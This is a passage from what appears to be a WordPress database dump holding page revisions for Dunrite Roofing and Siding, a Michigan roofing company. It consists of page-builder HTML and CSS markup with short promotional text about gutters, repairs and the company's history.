style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Gutters</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>As a vital role in the overall protection of your home call today for a free estimate on new seamless aluminum gutters by Dunrite.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"e26c5c0e\",\"title\":\"Repairs\",\"content\":\"We specialize in finding this and proceed swiftly to correctly fix the issues the first time. Call today for a free estimate on a repair quote by Dunrite.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-e26c5c0e gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Repairs</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>We specialize in finding this and proceed swiftly to correctly fix the issues the first time. Call today for a free estimate on a repair quote by Dunrite.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item --></div></div>\n<!-- /wp:skt-blocks/accordion --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPaddingMobile\":40,\"blockId\":\"f2114293-462b-4392-b505-b5c4a73f6f49\"} -->\n<style type=\"text/css\"> .block-f2114293-462b-4392-b505-b5c4a73f6f49 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-f2114293-462b-4392-b505-b5c4a73f6f49 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-f2114293-462b-4392-b505-b5c4a73f6f49 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-f2114293-462b-4392-b505-b5c4a73f6f49 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-f2114293-462b-4392-b505-b5c4a73f6f49 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-f2114293-462b-4392-b505-b5c4a73f6f49\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":20,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/faq-img.jpg\" alt=\"\" class=\"wp-image-20\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Home','','inherit','closed','closed','','336-revision-v1','','','2022-08-24 23:38:22','2022-08-24 23:38:22','',336,'https://cteisys.com/?p=494',0,'revision','',0),(488,1,'2022-08-24 23:22:42','2022-08-24 23:22:42','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"f90851d4-c514-47ae-86e7-eec3151567da\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#ffffff\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-1\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-1 skt-blocks-block-section-outer-wrap block-f90851d4-c514-47ae-86e7-eec3151567da background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-f90851d4-c514-47ae-86e7-eec3151567da .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-f90851d4-c514-47ae-86e7-eec3151567da .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-f90851d4-c514-47ae-86e7-eec3151567da .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-f90851d4-c514-47ae-86e7-eec3151567da.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-f90851d4-c514-47ae-86e7-eec3151567da.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-f90851d4-c514-47ae-86e7-eec3151567da.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-f90851d4-c514-47ae-86e7-eec3151567da.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-f90851d4-c514-47ae-86e7-eec3151567da.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-f90851d4-c514-47ae-86e7-eec3151567da .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-f90851d4-c514-47ae-86e7-eec3151567da .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-f90851d4-c514-47ae-86e7-eec3151567da.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-f90851d4-c514-47ae-86e7-eec3151567da .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-f90851d4-c514-47ae-86e7-eec3151567da.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-f90851d4-c514-47ae-86e7-eec3151567da .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-f90851d4-c514-47ae-86e7-eec3151567da.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(255, 255, 255, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"ec9b4f49-717b-424d-8c1f-2e6b2881e683\"} -->\n<style type=\"text/css\"> .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"blockId\":\"3b8ab6fb-01d5-431b-91dd-de5fc7c626d6\"} -->\n<style type=\"text/css\"> .block-3b8ab6fb-01d5-431b-91dd-de5fc7c626d6 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-3b8ab6fb-01d5-431b-91dd-de5fc7c626d6 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-3b8ab6fb-01d5-431b-91dd-de5fc7c626d6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-3b8ab6fb-01d5-431b-91dd-de5fc7c626d6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-3b8ab6fb-01d5-431b-91dd-de5fc7c626d6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-3b8ab6fb-01d5-431b-91dd-de5fc7c626d6\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":386,\"width\":257,\"height\":530,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image size-full is-resized is-style-default\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/32926267_2062360403778390_9097229843803668480_n.jpg\" alt=\"\" class=\"wp-image-386\" width=\"257\" height=\"530\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"2d0e433e-b09c-451a-a1f6-274a9de78652\",\"opacity\":100,\"backgroundColor\":\"#fe8333\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-quality-box\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-quality-box skt-blocks-block-section-outer-wrap block-2d0e433e-b09c-451a-a1f6-274a9de78652 background-type-color alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652.background-type-video .skt-blocks-block-section {\n background-color: rgba(254, 131, 51, 1); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(254, 131, 51, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"88555fca-6dda-4435-9d42-f653c9586df1\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":32,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.3,\"headingTitleColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-title-text {\n font-size: 32px !important; margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-88555fca-6dda-4435-9d42-f653c9586df1\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.3;letter-spacing:0;color:#ffffff\">Quality<br>Works</h2></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></section></div>\n<!-- /wp:skt-blocks/section --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":15,\"leftPadding\":50,\"topPaddingTablet\":15,\"leftPaddingTablet\":35,\"topPaddingMobile\":40,\"leftPaddingMobile\":0,\"blockId\":\"cd3cb9ff-14b9-4cad-bfef-2367d403384a\"} -->\n<style type=\"text/css\"> .block-cd3cb9ff-14b9-4cad-bfef-2367d403384a .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-cd3cb9ff-14b9-4cad-bfef-2367d403384a .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-cd3cb9ff-14b9-4cad-bfef-2367d403384a .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: 50px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-cd3cb9ff-14b9-4cad-bfef-2367d403384a .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: 35px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-cd3cb9ff-14b9-4cad-bfef-2367d403384a .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-cd3cb9ff-14b9-4cad-bfef-2367d403384a\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"0f159bdd-7f31-4f5d-8116-79161efa80a9\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-0f159bdd-7f31-4f5d-8116-79161efa80a9\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Our Introduction</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Welcome to Dunrite Roofing And Siding</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"style\":{\"typography\":{\"fontSize\":17},\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\"} -->\n<p class=\"section-content has-text-color\" style=\"color:#494848;font-size:17px\">Based in Northern Oakland County Dunrite Roofing has been serving the surrounding areas for over 25 years. Quality workmanship and competitive pricing&nbsp;have led us to become a top choice when it comes to roofing and siding in southeastern Michigan.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"426cabfe-a2cd-4360-aecf-17fd567995fe\",\"topPadding\":0,\"topPaddingTablet\":0,\"bottomPadding\":80,\"leftPadding\":0,\"leftPaddingTablet\":0,\"rightPadding\":0,\"rightPaddingTablet\":0,\"topMarginTablet\":-15,\"className\":\"gb-renovation-contact\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-contact skt-blocks-block-section-outer-wrap block-426cabfe-a2cd-4360-aecf-17fd567995fe background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe .skt-blocks-block-section{\n margin-top: -15px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 10px; padding-left: 0px; padding-right: 0px; }\n}\n @media only screen and (max-width: 767px){\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 80px; padding-left: 0px; padding-right: 0px; }\n}\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe.background-type-video 